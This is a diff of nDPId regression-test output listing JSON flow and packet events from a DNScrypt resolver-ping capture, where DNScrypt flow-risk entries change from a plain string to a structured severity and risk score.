+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ144Aub0RxrQKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":295,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc149AAL0RhaAKAAABsDjtq8ijAbsCCGC6smUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15AgAL0Rod8KAAABsDjtq49EAbsGBJxWsmIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15AAub0RxrIKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":298,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc15JAAL0RhZ0KAAABsDjtq79wAbsCCGC6smMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15EgAL0Rod4KAAABsDjtq7zFAbsGBG7RsmYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15EAub0RxrEKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":946739317434,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739317434,"pkt":"ZmZmZmZmRERERERECABFAADXKh9AADQRgTsznqZhCgAAAQG7u8EAw9AjB2GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="}
@@ -628,28 +628,28 @@
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739317462,"pkt":"ZmZmZmZmRERERERECABFAADcYmgAADoRvwiwOO2rCgAAAQG7j0QAyAhasmKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwFtAAL0RvgEKAAABstjJ3uq7CAUCCD+NfScBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
